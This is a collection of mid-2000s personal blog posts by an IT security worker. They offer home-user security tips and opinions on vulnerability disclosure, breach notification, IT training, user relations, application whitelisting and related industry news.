You can also go crazy trying to keep up with the latest security news, updates, vulnerabilities, and patches. But why bother? Unless you're a geek or an IT professional, there is no reason to spend personal time being paranoid. Instead, home users can benefit from education and careful habits when working or playing on their computers.

For homes user, I assume the user is just operating one or a couple systems for the primary purpose of surfing the web, gaming, entertainment, and personal uses. No servers, web servers, mail servers, etc, are assumed. Once you get real servers with open services, the game changes quite a bit, and most home users do not do those things anyway.

1. Backups. Always back up important data to a second hard drive or system. If possible, do it twice and keep one set offsite somewhere. Windows has built-in mechanisms for automatic backups, but if you don't mind doing it, at least just drag-n-drop all the important stuff over. Imagine if your hard drive dies in the next hour and no data is recoverable. What is your pain? What will you miss? What cannot be recreated? Back that up. USB or Firewire drives are cheap and easy to get. Buy a spacious one and use it for backing up data regularly. If you can back your data up to a drive stored offsite or in a fireproof safe, that is even better.

2. Firewall or NAT the Internet link. Actually, it is much easier and more common for home users to simply operate behind a NAT device such as a typical cable router or wireless router from Best Buy. That is typically enough, but if the opportunity is there, run behind a Linux firewall, either iptables or SmoothWall/IPCop or something. This one step is enough to stop any curious Internet-side parties from getting into your systems. If you're not sure if you are protected by a NAT device, ask someone you know to check, or call your ISP and ask their support if they know. Be ready to let them know what your cable modem or DSL router model is. If you are not behind a NAT device, ask about how you can implement one. Most ISPs have recommendations and instructions on this.

3. Turn on Windows Automatic Updates. Every now and then perform a manual Windows Update, but otherwise just turn on Automatic Updates to automatically download and install on at least a weekly basis at a time when the computer will be on (like 8pm or something). Not only will this apply necessary patches, but can enhance or fix features like wireless options.

4. Practice safe computing. Do some common sense things to stay safer online. First, don't install every new and neat free program that tells you to install something or that you need something. Chances are, there is a reason it is free and enticing. Treat it like you would any advertising on television or radio and just be wary. Second, do not open any email attachments that are not sent from known people and are expected. Just delete those emails. Likewise, do not click on any links in emails unless from known people and the email is expected. when in doubt, just delete the message or type in the address to your web browser as opposed to copying it or clicking it. Third, do not frequent questionable sites, especially when using IE. If you are visiting a site you wouldn't want your parents or kids to know you were visiting, chances are you shouldn't be there. Avoid that darker and more dangerous side of the web. Fourth, always close pop-up windows. Never click inside them or respond to ads on sites. Just never do it. Fifth, if possible, use only one credit card for online purchases, keep the credit limit as low as you can while allowing you to do what you need, and always go over the monthly statements.

5. Protect your passwords. Write down all your passwords and put them someplace safe, but easy to get to while at your computer. I know, many security people will look aghast at this suggestion, but when it comes to home users, there is little real reason to trouble people with anything more complicated. Get an envelope and write down your passwords on paper inside it, and keep it tucked safely into a drawer or even inside a book. I suggest making two copies of this and storing it somewhere offsite, especially if you do lots of banking and other monetary things online. You don't want to lose your accounts because you lost your passwords in a fire or something. I do suggest not sharing passwords amongst spouses, roommates, or even your kids. Don't let them find or use those logins. Also, do not use the same password for everything. I find it best to have 3-7 different passwords. For anything you don't care about, use your first password. For more sensitive things, use other passwords. You can use multiple, but just think if one password is swiped by a hacker and is linked to your email account which has the same password. You can't usually protect yourself from lost accounts on various websites or even forums. They may be run be unethical people or they may be victims themselves of a break-in that divulges your personal information. More technically inclined users can look into using a program like PasswordSafe to store their passwords securely on their computer. Be sure to make a backup of the storage file.

6. Don't use Outlook or IE. Yes, IE and Outlook are easy to use and everyone uses them, making getting informal support painless. But just like ease of use is high for users, ease of use for malware is even higher. IE has had holes for years, unpatched, deep holes, and will continue to have them because it is so deeply married into Windows itself. Ask any IT pro to uninstall IE for you, and you will get the wide-eyed response that they can't. To make an analogy, IE is so deeply rooted into Windows, you cannot separate it out. That's dangerous, and Outlook is no better. Instead, use something less mainstream and exploitable. I recommend Firefox as default web browser and Thunderbird as an email client. Both are free, easy to use once someone opens their mind up and accepts a little bit of change, and suffice for 98% of everything users do with email and web surfing. This software switch will nearly eliminate the risk from email worms (although will not stop spam or malware attachments designed for the user to execute as opposed to running from a preview pane or through Outlook's tools) and drastically lower adware and spyware infections from web surfing.

7. Run antivirus software. Many new computers for most users come with antivirus software. Be sure it is set to update automatically, and pay for the protection if required. For somewhat technically inclined home users that practice safe common sense computing, this software may not be entirely necessary, but I suggest it for decent protection, detection of most malware, and peace of mind. I suggest F-Secure or Kaspersky as opposed to Norton or McAfee, but chances are the latter two came with the new PC. If so, stick with what is pre-installed. And yes, make sure it downloads new updates or signatures on a daily basis.

8. For wireless at home: secure your wireless. If you run wireless at home, be sure it is secured by at least WEP encryption. If available, use WPA encryption. This will prevent a huge majority of neighbors from hopping onto your wireless connection. Not only can they use your Internet link for their own traffic (legal or illega), but they can also probe at your network and computers and sniff your traffic if they get on. And yes, trust me, young adults and kids are curious creatures and will try these things if they have that sort of knowledge. Turning on encryption will prevent any but the most determined attackers.

9. For laptop users: be paranoid when at hotspots. Lots of people get fancy with recommending Tor even SSH proxying for secure access at wireless hotspots. But lets face it, only the technically inclined bother with such things. For all other users, just assume the wireless hotspot is not a safe network. Do not stay on wireless hotspot networks for too long. Do not log into email through Outlook or Thunderbird when at a hotspot. Do not log into a website that is not SSL-enabled. If you use IM, assume your conversations are being read by someone sitting near you, and, in some cases, assume they now have your login account and password. If you do not go to hotspots very often or you had to chat in IM or check email, once you get home immediately change your passwords for those systems. Hotspots are fun places for geeks like me who are curious about other people, and for people who would love to do you harm or mischief. Be safe when not at home. Now, what counts as a wireless hotspot? Any wireless network that is not your home network.

10. Get help. Like mentioned for small businesses, home users will benefit the most by befriending technically inclined friends and family, or even paying for the service of a home consultant or contractor to help you out. Always be nice to your experts, though, as we do tend to get tired of high maintenance users, especially if we're not being compensated for our time. I strongly suggest just asking your technical friends questions as opposed to asking them to actually do things for you. You can get really good return, though, for paying someone a little bit of money to spend an evening or some hours tuning your system and giving you some education on what the best things to do are. All the steps above are either behavioral (education), one-time deals where you set it up and that is it, or a few that require some additional changes or on-going action. Spend some money, hire up someone on the side that knows their stuff. If nothing else, befriend them and make a night of it with pizza, beer, and maybe hang out for a movie or something while they do their wizardry.

PS: I added a "1/2" extra step in a later post on getting to know how to reinstall your operating system.

These security and networking posters might be worth the money someday. Kinda spendy, though...

The weirdness of this whole debacle between Maynor/Cache and Apple involving possible Apple wireless driver exploits continues. There are some fishy things going on here, and Apple is being very shifty in their dealings.

I previously likened the weight and importance of this situation to what Michael Lynn went through with ISS and Cisco last year, and the similarities continue to grow. David Maynor has been forced to pull out of his revelatory Toorcon presentation which was probably going to finally pull the veil back on this situation.

Now, SecureWorks and Apple are working through a third party, CERT, on security issues. Sadly, there is the possibility that Applie may stiff-arm CERT as well, which kinda digs at a suggestion I read and agreed with that perhaps security issues need to be verified by a third party so that full disclosure and corporate protections can coexist.

Unfortunately, the integrity of a third party is then in question, as are the rules of engagement for that third party. As Brian Krebs' mentions, what if CERT decides to just never authorize the release of information? We're back to having no real solution for the full disclosure debate.

If this keeps up, full disclosure will just plain happen, and corporations affected will simply be alienated from the research communities. Also, complete non-disclosure will happen by those who can't afford to fully disclose and possibly be attacked legally, which threatens the health of our systems and networks when corporations just stifle any problems with their products. In that case, one may as well sell the exploit to someone else.

Not only that, but just look at Brian Krebs' comments to see exactly how enflamed and impassioned even the security industry can be, on both sides of the issue.

A little closer to home, it seems University of Iowa has had to notify 14,500 persons that their data might have been disclosed. I like that the announcement qualified that the likelihood of disclosure was low. In other words, an attack was detected, but the extent of the breach was unknown, but this data was accessible on the system.

This makes me shake my head and wonder when this disclosure storm will end. Disclosing possible data thefts and leaks is just not a scalable or long term solution. It is not even a short term solution. Very quickly we will all become numb to this activity, not care, and even if we understand what to do by reading the letters and FAQs, we still won't do much more or change our behavior as users and consumers.

But there are other reasons why this is a poor decision. For instance, there is this huge grey area on defining what is a disclosure. What if a system was broken into, but all indications point to the system being used to house pirated movies, but *may* have had data disclosed? Do you have to disclose it if there is a reasonable expectation? What about a networked system that is not fully patched and is noticed to be out of date? Theoretically, it could have been attacked. What if the hosting company would not have detected such an attack? Is it reasonable to assume that system was never accessed fraudulently? And just where to 0day attacks fall into this picture? What if there may be the potential for disclosure in the future, which is not all that unlikely given a Windows architecture and the mishmash inner organization of most IT infrastructure from the perspective of the malicious insider. Should we disclose when information is just simply being stored in a non-optimal way?

And that is not even to begin to get into the grey areas within organizations on disclosure and reasonable expectations. Who is held accountable for hardening systems, detecting problems, escalating them to those that need to know, and then disclosing them? How much grey area or liberty will be taken with interpreting the regulations and expectations?

No matter the answers, the current practice of forcing disclosure of possible data thefts and possible identity theft are not very good procedures and may do more harm in the long run than good. But at least it drives home to C-levels the need to pay attention to this stuff, and not just treat IT like some arcane entity working behind a large screen. The handling of information and data access is only going to become more and more important over the next 10 years (and anyone having tried to track access to data and permissions in anything but small corporations will be able to relate exactly how difficult this may be).

And yes, at least this is the start and it is something, as opposed to diving straight into analysis paralysis and doing nothing.

Having started a new job this past spring, I've had some firsthand experience in starting out in a new IT (networking/sysadmin) role. And I have since become pretty sensitive about what I think is one of the most important things with new IT hires.

Recently, more talk has surfaced about IT hiring the right people and then training them for their job, as opposed to hiring only people trained for the job and hoping they have the ethics and soft skills needed to do a quality and loyal job.

One of the biggest challenges, and in my mind, mistakes, in managing my new employment has been lack of real training when starting the job.

Let's face it, even in the midst of regulations and standards flying around about how IT should secure and run their operations, there are no two shops that do something even as simple as track and allocate IP addresses the same, let alone all the other little stuff and multitude of settings in servers and devices (one of the reasons I really do not enjoy Windows Sysadmin work as much as networking). This means that any new people are either going to sit back and wait to be shown what to do, or will attempt to dive right in and possibly screw something big up either right away or maybe not even detectable for months or years. While I do believe in just getting things done, I've seen what happens to people (especially in my last job) when they make a simple mistake or move forward too quickly and how that will paint them in the eyes of the people who matter and write the checks, even if those same people were the ones who put the pressure on getting things done quickly.

So I feel that job training early on is paramount, especially for any Windows Sysadmin type of support work that is not very finite or narrow.

Training will also acclimate new employees with existing employees to gain some team cameraderie, which will more quickly open the avenues of discussion, collaboration, and comfort in asking for help when needed.

I think the best form of training is not necessarily documentation, although that is highly important, but actually just doing some shadowing of coworkers for not just a half day or even a day, but for a few weeks, to get used to the tasks, load, culture, and attitudes of the job role and team. In this way, also, the new employee made confide their own comforts, interests, and desires to their colleagues more than a manager, and thus their niche in the team may more quickly develop. This might bog down the existing employee who is being shadowed and sharing some of his workload with the new person, but in the long run, this is far better and I think will lead to a happier worker.

I feel that very, very few IT sysadmins and networking people can step into a job and do an effective job without lots of experience or in a contractual role that is narrow by definition.

Unfortunately, with my current job I had about a week and a half of corporate training with HR, phone systems, and other general stuff like benefits and customer service. This is all good and fine, but I had maybe a half day with the most senior analyst that I work with, and got shown the physical data center and where some things are. That was about it, for the most part...which has left me, 6 months later, still feeling disengaged and not entirely happy or comfortable with the job and network I work in. It is definitely an uphill battle that I am having to slowly tackle as the tasks slowly mount.

There has been a lot of articles and posts lately about users and the user experience and how IT interacts with users.

My "first" read on this came a few months ago in Network World, What users hate about IT pros, to which I rough-drafted a response essay I never did post on here on exactly the opposite topic, What IT pros hate about users. In the past few weeks, even more posts:

the snide IT attitude | counterproductive approaches to IT | dan morrill #1 | locutus | dan morrill #2

So who is right and who is not? Honestly, they are all right, to an extent.

There are problems with IT staff and "normal" users meeting together to work effectively and create proper solutions for a business. But the subject is far more complicated than so many writers are trying to make it out to be. In order to really look at a solution that works for a given business, the IT roles need to be better defined, the corporate culture needs to be evaluated, and then the exceptions need to be acknowledged.

IT should be sliced into smaller chunks as there are vastly different roles in an organization. What is important to, and how that employee relates to such things like users, differs even in our own field. Internal application developers will be different from those that develop applications sold to external users. IT shops that host services for external clients differ to those that just host internal infrastructure. A networker is different from a help desk jockey is different from a CIO. In fact, in each of those areas there are even still different roles that the workers and managers each fit. A help desk jockey is different from a help desk manager.

Does a backend networker need to be attentive and aligned with business needs as much as his or her manager? Or perhaps the user-facing help desk jockey? What about an application developer creating a standard application that will be used by 100,000 customers versus the internal application developer creating a system to be used by 10 people all located inside the company?

Once those chunks are defined, one can then look at a target corporate culture and managerial paradigm. Only then can real statements about IT, users, and the relationship of them be effectively made. Are the users technical in nature or not? Does the corporate culture encourage worker to worker interaction across boundaries, or does all of that occur only through manager levels? Can a beer be involved? Is it important to a business to have a customized service or a standardized product?

Lastly, look for the exceptions. It is true, sometimes customers make unrealistic demands that are a detriment to IT or even the business. When a customer gets on a metro rail system, do they expect to be allowed to guide the train and stop it at exactly where they want to get off? No, and to demand such when getting on the train is unrealistic. Likewise, users getting on the IT train need to plan and make requests properly as well, or at least be open to the possibility that their (and every other user) request may not be met. While the metro rail customer may be able to appeal to the train boards to add a new stop that happens to be closer to their home, what if every user made that request no matter what part of the city they were in and are not satisfied until the train stops within a block of their house? In that case, many someones will be disappointed in their request.

There is something to be said about being a good IT provider, but also about being a good IT customer.

But what if there are to be general, blanket comments and attitudes made? Is there some credo that all IT people can live by to do their work effectively and prosperously in the business world?

Perhaps. In the end, it is not about making a better widget, improving uptime, or meeting every customer demand both internal and external. It all gets back to the things that matter in life, the soft skills of working well with people and users and IT pros. Be respectful, professional, and honest. Work together to make great things happen in a company.

To bring this back to information security, Dan Morrill says something I think is important and cannot be said enough. If we end up being roadblocks to users, users will adapt and do things some other way which may introduce security and audit issues, widen the gulf between them and IT, and cost the business money.

The real bugbear is trying to figure out how to best work with the users in a given role with a given corporate culture and with the exceptions that will occur.

Go figure. Just this morning read an internal IT newsletter about this same subject. All of this information is second-hand, but I may just check out this book soon. The book "The Geek Gap: Why Business and Technology Professionals Don't Understand Each Other and Why They Need Each Other to Survive," by Pfleging and Minda Zetlin, claims that the "geek-suit" divide is inevitable. Here are some bullets points as to why:

The tech worker, the geek, is a problem solver; the business person, the suit, is a people influencer. The geek likes to fix things, the suit relies more on people skills. Geeks and suits also interact with technology differently; the former are more interested in process while the latter are more consumed with use.

To geeks, a piece of technology is a thing of beauty in its own right, a wonderfully fascinating puzzle. To suits, it's a tool that is only worthwhile if it helps them accomplish their objectives.

The moment geeks are likeliest to lose interest in a project is when it's running perfectly ('Hooray! Now I can stop working on it!'). That's the moment suits are likeliest to start taking interest in the same project ('Hooray! Now I can start working with it!').

Technology and business people differ in terms of career aspirations and lifelong goals, and relate differently to their workplaces. Tech people typically do not identify themselves by where they work but by what they do. It's more important to them that they are in the community of, say, .Net programmers or database administrators rather than at the company where they work. Business people are much more about climbing their company's ladder.

The authors do go on to give points about how IT and business can help bridge that nearly inevitable gap, including cross-functional teams, intermingling, job exchanges, and business people doing what IT people now are doing: learning about how the other side works.

Since I spend most of my lunch periods nursing a latte at a nearby Barnes & Noble and recouping the cost by reading magazines and books, I may skim this to see if it is worthwhile to fully read and have on my shelf.

I've reformatted my new laptop harddrive, installed Windows, carved up the partitions to give Windows roughly 20GB, Ubuntu 30 GB, and the other 50GB for eventualy virtual machines.

I did this because originally Ubuntu just decided to take the whole disk, and I've had experience with Windows just not playing nice with Grub if it isn't loaded first. So now my system is in a moreorless state of completion to move forward again.

This also means I've spent a bit more time in Windows again, getting the new install configured up and things back to normal with email and such. Thankfully, since I build systems so much at work and home I've learned not to get fancy. Back in the day I worked with such things as WindowBlinds to make my Windows all fancy and neat and pretty and slick. But I quickly realized I don't want to spend a week redoing all that fancy crap every time I format.

Anyway, now that Windows is situated and my old drive is mounted in a USB enclosure fitted for laptop drives, I am now back into Ubuntu and moving forward with getting things installed and using it for more every day use. Next step this week sometime: get my email ported over from Thunderbird to...Thunderbird! Piece of cake!

This article got me thinking about how Microsoft is packaging some things into Vista that will put some current software makers into a real bind, such as free antivirus protection and free pdf creation/reading programs, and no doubt more.

Immediately I bristle at the notion that Microsoft can make these things better than those who specialize in it. I immediately think about all the monopoly issues that may arise, especially if Microsoft toes the line too far (particularly in Europe) and prevents competing products from being installed.

But the more I think about it, the more I truly think they have a good approach. The average consumer couldn't give two rat asses about needing third-party antivirus, firewalls, email spam blockers, a secure web browser with pop-up blocker and decent enough features for your average middle-aged worker or teenage myspace rat (now displacing mall rats). When I buy a car, I might add on little package deals like ABS and Airbags, but I certainly don't have to shop at Sears and pick from multitudes of vendors and pray I pick something compatible that does that job I want.

Consumers just want things to work with as much security as can be put in without getting too anal about it. This is the niche the Mac has enjoyed for quite some time: elegant simplicity and usability. Microsoft needs security in their OS, and they really cannot get away with just letting third-party software makers do the hard work they should be doing. Not only is it a bad long-term approach, but it also stymies the average consumer who doesn't want to constantly tinker with firewall settings and spyware scans and keeping up to date with 6 different programs and pay for those upgrades every other year...they just want it to work.

We just want it to work, not overpower out lives with complexity (like the VCR clock), and not be a completely leaky hole. Security holes will always exist, especially in the market leader, but let's get serious about what the future is. So far, that future still has Microsoft on the forefront, even if I think Vista is going to be ugly, complex, large, buggy, and still clinging to that old underlying architecture and assumptions that made Windows 98 and XP bad. But hey, they're moving in the right direction and once that big ship gets turned the right way and starts plowing along, they'll do some more great things.

In the meantime, I'll stick to older Windows OS and Linux and pine for a Macbook in the near future.

Spamhaus' recent continuing issues help convince me that spam blacklisting on a global or huge scale is just not worth it. Right now there are lots of firms doing a million little workarounds and hacks to offer up services for safe email, secure email, spam-free email, etc. All of these are built on an insecure protocol and are almost all really bad approaches that will work for a few years and for a decent scale, but are not the approach that will last.

Spamhaus was forced to take a company off their blacklist and pay millions of dollars in compensation to a mass-mailing company that won a suit again them (so I read). I've seen the cost, firsthand, to a company that gets wrongfully blacklisted (or rightfully blacklisted), and it is just not pretty.

Instead of the workarounds and hacks, someone needs to make a better protocol or force more use of the secure versions of those protocols. Let's face it, eventually all traffic is going to be encrypted or obfuscated in some fashion, even if it takes 50 years.

Better yet, adopt something new, like instant messaging over P2P or something similar. Email is surprisingly hanging on despite IM and texting and cell phone use. Will it really still be around in 15 years? I'm skeptical...

This topic has been buzzing around in my head a while now, and is finally ready to trickle out. But first, I need to set the stage. (This is going to sound more preachy then I intend, and has also become the unfortunate victim of me being interrupted a couple times at work and unable to put all of this down coherently...sigh. )

- You are never 100% secure, nor is there any silver bullet device, application, or methodology to security in this information age.

- Technology keeps moving at a fast pace, faster than it takes for any security team to dig solid trenches and fox holes and fortify the hills.

- And it keeps getting more complex, sometimes piling more complexity on top of insecure technologies. Complexity yields less security.

- Just today I read a couple doom-and-gloom articles by Richard Grimes, one recent and one from a few months ago. He has a point that security is largely lip service until AFTER "the big one."

- Also some talk about more appropriate consulting and pen-testing from Dan Morrill and Wendy.

- Let's face it, with so many different technologies, business needs, solutions (in-house and out-house), people, and problems, no two corporate networks are alike. Not even close.

Based on all of this, I am convinced of a number of things. First, we should all continue to share as much information as possible, and keep working at those communication lines. One thing that I don't think there is enough of, is on-site tours and demonstrations. Case studies are one thing, but get me and some buddies in the industry into each other's NOCs and systems and let's see first hand what is working or not working. I would love to see how a company like Boeing manages and works their campus wireless systems. Yes, it might be a security concern to let me know, but like Schneier would say about crypto algorithms, if disclosure hurts it, it's not secure anyway. Many corps have some excellent processes and setups, but they can never get talked about in meaningful ways that can help the rest of us. This is one reason I would love to become a pen-tester, assessor, or consultant...so I can see these solutions and build upon other people's hard work and loving efforts.

Second, we need to look to securing our own islands first, before we're going to be able to help with the whole world's picture. What works for one island may not necessarily work for another island. We need to be aware of that, such that not only is there no one device or application that can give 100% security, but there is also no such device or application that is appropriate for all environments (something the sales people don't understand). If we can't handle the microcosm of our own networks, we have no hope to make sense of the macrocosm of the Internet and the world's networks. Your island may be the only place you'll be able to experience a wave of security nirvana...at least for a few moments. Besides, if internally we are unable to quickly show who has access to our client XYZ's data that we are a custodian of, how can we begin to counsel other islands on how they should handle information?

Third, we need to fight the battle of complexity. Technology will move on and keep getting complex, but many attacks and defenses and competencies of security and security professionals remain grounded in simple basics. We need to keep those basics at the forefront of our minds, not make the security process so complex that we all stand up so high on rickety scaffolding as our foundation to climb to the clouds. Yes, it can be complex and full of frills and thrills, but never compromise the basics for those complexities.

Yes, security seems like a losing battle, but that is what makes this field exciting, ever-changing, a challenge, and a solid career. :)

I am going to deem today analogy Thursday, as I was looking for some ideas on analogies for how dangerous the Internet is, namely the web. It is just an odd situation that the Internet is inherently bad and malicious and that users need to take care when surfing. Yeah, like many people really truly take care...

What if television surfing were as dangerous as web surfing? This means that as you flip channels into some of those more obscure higher-digit stations, one may just hijack your television box and switch channels around, or just force them to switch much slower or only view their station until you reset the box and start from scratch. Oops!

What if shopping in a mall were as bad as surfing for places to shop online? Outside of some shops we'd have people jumping up in front of you with signs and coupons and good deals in hand, sometimes getting right in your face and flashing their goofy colorful smiles, causing young children to begin crying. In addition, random stores may put things in your pockets that you won't realize melted in the hot sun until you get home and put your hand in there. Oops! They might even put an RFID tag on you while you're not paying attention, and then follow you around through the rest of the mall. And city. And into your home, happily writing down everything you do on the off chance that they will learn how to market better to you. Who knows when you get into those stores!

And those free samples of chicken at the grocery store? Yeah, nothing is free. In fact, those samples contain powerful lingering doses of laxatives that will force you to stay on the pot for an hour each day for a month. But hey, the grocery store offers toilet paper and other remedies for a fee to help deal with that!

What if browsing a library for books to read were like browsing web sites? Every now and then, a book would take it upon itself to grab your arm and not let go, despite the alarms you cause when you walk out of the building and the nasty looks you get. In fact, some books may look like children's books, but inside are pop-up porn cut-outs. Oh, those long-lost joys of pop-up books! Yay!

Now, the one place where an analogy is a lot more appropriate for the web would be roaming around in nature. You never know if you might turn a bend and run into a bear, a rattlesnake, or even swim up on a stringray. You might just get chomped, bit, or speared if you're not constantly careful and aware of the dangers. And the more dangerous a particular area seems, the more likely it is dangerous. Thankfully nature typically provides warnings such as a snake's rattle or colorful markings on dangerous creatures. Likewise, web sites give off warnings too, if you know how to look for them. And would you stick your hand in a strange hole in the ground or sleazy looking pond without first doing some risk analysis on the odds of a badger or water-borne parasite present? And lets not even think about ninjas and how they might stealth up on the trail when you least expect it.

The web isn't what it used to be. While it has become prettier (not including MySpace pages which is the new GeoCities) and more useful and informative, it has certainly become a lot more dangerous, insidious, and complex.

A researcher has posed that it is worthwhile to get a 30-inch Apple monitor ($1999) because it improves worker productivity.

I really think some researchers are just not that thorough. Yes, you can likely get more work done with more desktop real estate, but how does this compare to a dual monitor setup with, say, 2 17-inch or 19-inch monitors, which would cost far less than $1999? I think unless you need contiguous screenspace (such as with Autocad, Photoshop, or maybe movie editing), the dual or even triple monitor approach is much more worthwhile than one huge single screen.

Do we even need dual monitors? Not necessarily. I currently work on just my laptop screen, although I certainly would make full use of dual monitors like at my last job or at home. As a networking and security geek, I could actually make use of 10 monitors if I had them, displaying things like dashboards, traffic sniffing, alerts, remote control sessions, etc. But for your normal workers, one monitor, maybe two, is sufficient for their job. Eventually, I get into the realm of wanting separate systems as opposed to more desktops or monitors.

I will say, if you want to impress pretty much anyone at work, grab a spare system or two, set it up next to you, and have it running pretty graphs, traces, and dashboards nearby. People seem to think that amazing, even if it is just gibberish. :)

From a CNET article,

"I don't believe user education will solve problems with security because security will always be a secondary goal for users," Gorling said. "In order for security to work, it must be embedded in the process. It must be designed so that it does not conflict with the users' primary goal. It can't work if it interferes."

His first sentence is correct. It is true, user education will not solve our problems. If education solved our problems, we would have a different president right now.

Indeed, as I always say, security is a secondary goal, even for developers and network administrators, let alone your average regular user. Functionality is always first, i.e. getting things done. "Getting it done securely," while a way for managers to package in security as just as important to getting it done, is still just a qualifier to "getting it done."

The second sentence is correct as well, we need to embed the process as much as possible. The systems needs to be more protected from dumb users or just simple mistakes in judgement. The network needs to be more protected. This is the real key where prevention systems come into play. Detection works wonders, but the assumption that users will make mistakes means you need prevention, mitigation and incident response, and audit trails (detection and logging).

And then his last few sentences are the real problem. We have to do these security things without impacting the user's primary goal of getting things done.

Now, I really believe education will not solve our problems, but it will go a LONG way toward helping. Just because education doesn't solve all our problems is not a valid argument to say we should throw our hands in the air and not do any education. I like the mention in the article about giving users some education while actually attending to a problem. This is highly effective and focused education that can have an impact. Education makes an impact and some people do want to learn and be better about it, but it is true, it won't solve ALL our problems. But the speaker is correct, we shouldn't hold up education as the root solution to our problems.

It is highly important to make sure security does not unduly interfere with employees getting their jobs done. However, this goes both ways. Employees need to be receptive to changes in their job. A security-induced change may not even impact users if they were to just adopt the new way of doing their job. Sometimes this battle between security and usability is just human nature being stubborn and unwilling to change, even if those changes result in less work for the user.

I've slowly become a minor proponent of having less rules and less impact on users. I detest rules and limitations on my computer use at work, which impacts my happiness and thus my productivity. Now, I may be a bit more progressive in my use of the Internet than many people that I work with, but slowly, attitudes will change as more and more people enter the business world that have grown up with a computer in their rooms and their social lives have long incorporated the use of a computer through web pages, blogs, IM use, email, music, and so on.

We still need education, but we also need to make sure we do our professional diligence on the back systems and networks before dictating what users can and cannot do. And I truly believe we need less rules, overall, in our businesses. We just need smarter rules and enhanced incident response. Rules stifle innovation and happiness, and we need both in our businesses.

Read this article on DarkReading.com about whitelisting of applications. I like this point:

But whitelisting has a down side. These endpoint tools come with plenty of administrative overhead as well as security risks. "The institutional overhead in maintaining them is extreme," says Thomas Ptacek, a researcher with Matasano Security. "Some poor group of souls in IT is charged with deciding which applications every sales person or project manager can run, and has to backstop all the ensuing arguments."

What are the pros and cons of application whitelisting, and where do I stand?

PROS
First, when machines are imaged or supported by IT, they should have a list of applications that need to be loaded for new hires or replacement machines.

They should also have a list of applications to expect, that IT may or may not have to provide at least a little bit of support for (yes, we'll help you with Outlook, no we won't help you with Alefox or IE toolbars). Related to support, security persons responsible for keeping up to date on patches need a list of applications they should be checking. IT should not be expected to be knowledgable on patches for every toolbar app that may be used in the corporate environment.

Additionally, disaster recovery may require knowledge of what is necessary for groups such as sales people to do their jobs.

Much like firewall rules, default deny with a whitelist of allowances is much easier to maintain than a blacklist. You can blacklist categories of applications (P2P, IM, etc), but even those lines continue to blur. However, we already do see lines blurring in those categories.

CONS
Take this scenario. Sales requests a new application on their machine. Those "poor souls" in IT then have to research it and either add it to the whitelist or explain why it should not be allowed. With strong policies and management support of policies, this might be ok, but I believe most companies will put those "poor souls" in the unfortunate position of either saying "yes" to requests or being in a hard place when trying to say, "no." The end result is wasted resources, unnecessary negative feelings towards IT by the sales group, and overall less authority. What if the sales group has already been using the application for 4 months? Those "poor souls" really are poor souls.

(Honestly, those "poor souls" need to be backed heavily by a manager-level person, otherwise anyone smart enough to do proper evaluations and even backstop the ensuing arguments is not going to be in this sort of a position for very long.)

And what if each department is asked to create such a whitelist of programs that are needed? I've seen managers throw back every single program they can think of, whether it is really necessary or not. "All of them." Many managers and business users do not care to be bothered by such things, but will detest IT making the decisons for them.

As long as users run Windows, run as Administrator, and all sorts of things want to get installed or used (some even as benign as a proprietary web player like Flash or similar), trying to maintain a whitelist of programs that are necessary is difficult.

Whitelisting will stifle innovation and the ability to try out new applications and tools.

So, where do I stand in all of this?

I think some whitelisting is necessary, but it cannot end up being heavy-handed unless the company has some serious security requirements, small niches for their computer use, or is a majorly large network where application management is nearly impossible. IT certainly needs to maintain a list for proper imaging and support of workstations.

This goes back to what I said in my previous post: less rules.

Less rules. Smarter rules. Better mitigation, response, tracking. Better perception of organizational IT. Let people, within reason, do as they wish on their workstations in order to have a productive, happy life with the company.

This paper about the use of Google Desktop in forensics is concise and informative. The most interesting aspect of this is just how much Google Desktop indexes and makes copies of. Email, local files, network files, and even web surfing histories are stored independent of those applications of the OS. This means that even a laptop that shouldn't have sensitive data on it may still contain copies of open network share files that the user has access to, confidential emails, or even files from other users on the same system. In addition, web surfing history and some artifacts are also retained, even if the user attempts to clear those things in the browser options or with a third-party privacy tool.

The only limitation so far is that inability to just read the files. You have to copy the files to a separate machine, make them Read Only, and then open those files in that machine's Google Desktop Search tool. But still, this can act as a powerful tool to find some artifacts. It can also act as a surprising vector for data leakage in an organization.

I think one barometer of how IT and security are moving more in tune with the business world instead of being some back room geek department, is how often I read buzzwords and newly created words.

I just read the Websense H1 2006 Security Trends Report and was amazed at all the new words I found.

We have malware, adware, and spyware. I guess I should have seen crimeware coming. Websense I guess crimeware is software use to commit a crime? I think I will stick to malware as my term of choice. I have also seen eCrime.

I also gleefully read how a host with multiple phishing sites is termed to be host to numerous phishes. Phishes...does that mean the host can be called a phish tank, or perhaps a pond? And would abandoned sites be phishheads? The report also referenced spear phishing, which is a more targeted phishing attack. Honestly, I think almost all phishing attacks are a bit targeted. While that term I have heard before, it still amused me since I started looking for these creative terms.

Screen scraping applies to those malware components that take screenshots of the users screen, a means to thwart captchas and virtual keypads kinda like a keylogger for the whole screen itself. Screen scraping just does not sound fun, and reminds me of a windowwasher or perhaps a visit to the dentist.

Now, while I might poke fun at the report for the terms used, the information presented is excellent and a very good read on the trends that Websense has been experiencing so far this year.

All of the HITB2006 papers are online now.

A quick pointer to an archive of Black Hat media presentations. Save the interesting ones, since they do cycle them regularly.

Black Hat 2006 papers and media are available. Scroll down for the video portions. Also, the archives are a good place to be for even more media.

Defcon 14 presentations

Black hat 2006 presentations

I know this is ComputerWorld, one of the ad-driven free mags that tend to review products and state the obvious, but this quick article on 10 tips to secure VPNs is a pretty good and quick read with some specific technical details as well as common sense items that are sometimes hard to get management levels to listen to (such as only opening the VPN to those who truly need it). I like that some of the points are actually alternatives, such as secured mail or SSL/passworded web sites when, really, the need is smaller than the justification for a full VPN solution. Unfortunately, in other instances like jailing users from the rest of the network are a bit more advanced and complicated.

Of note, this response was given on Infosec News and deserves to be read in conjunction with the original article as the author makes some excellent points.

Screencapture in Linux can be tricky. Here are two resources to check out.

Wikipedia entry
vnc2swf

DD-WRT is a replacement firmware for some WAPs, including the models I have extras of. Adding to my personal project list.

About 6 months ago I started delving into the world of podcasting and began to quickly try and figure out which computer security-related podcasts were worth the trouble to download and check out.

I never did find a groove with my checks and samples. I don't have ipod-support in my car, and really don't find myself just listening to them in the background while I do other things. If my car were more equipped, I may have checked into things more. I also didn't have the habit of listening to them otherwise, or the time to download them and catch up or keep track of all of their release times. I don't use iTunes for my own personal reasons (I would if I had a Mac), and none of the other downloaders were really all that excellent. Doppler was the best, but there was always that one odd podcast that Doppler couldn't track and auto-download, which eroded the whole experience. As such, I just this weekend deleted all the old ones I had downloaded and have shelved the pursuit.

